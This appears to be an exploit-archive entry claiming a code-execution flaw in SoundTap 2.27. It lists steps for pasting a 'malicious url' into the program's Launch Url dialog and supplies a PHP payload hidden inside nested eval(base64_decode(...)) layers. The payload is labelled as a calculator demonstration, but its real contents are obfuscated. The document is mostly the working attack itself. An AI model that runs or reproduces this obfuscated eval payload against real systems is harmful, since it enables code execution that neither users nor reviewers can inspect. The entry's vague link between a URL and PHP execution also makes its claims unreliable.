SoundTap 2.27 - Code Execution Vulnerability

<?php
# Title : SoundTap 2.27 - Code Execution Vulnerability
# Author : ZwX
# Vendor : http://www.nch.com.au/
# Download : http://www.nch.com.au/soundtap/stsetup.exe
# Tested On : Windows 7

#################################################
#  Manual steps to reproduce the vulnerability  #
#################################################

# 1. Launch SoundTap.exe                
# 2. Click SoundTap -> Launch Url                     
# 3. Paste malicious url in input "Enter url Launch"
# 4. Click ok
# 5. PHP code executed successfully

#######################################
#    Code Execution Calculator        #
#   By ZwX -  Vulnerability Lab.com   #
#######################################

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy
                   UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V
                   2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs='));

?>

#  0day.today [2018-03-02]  #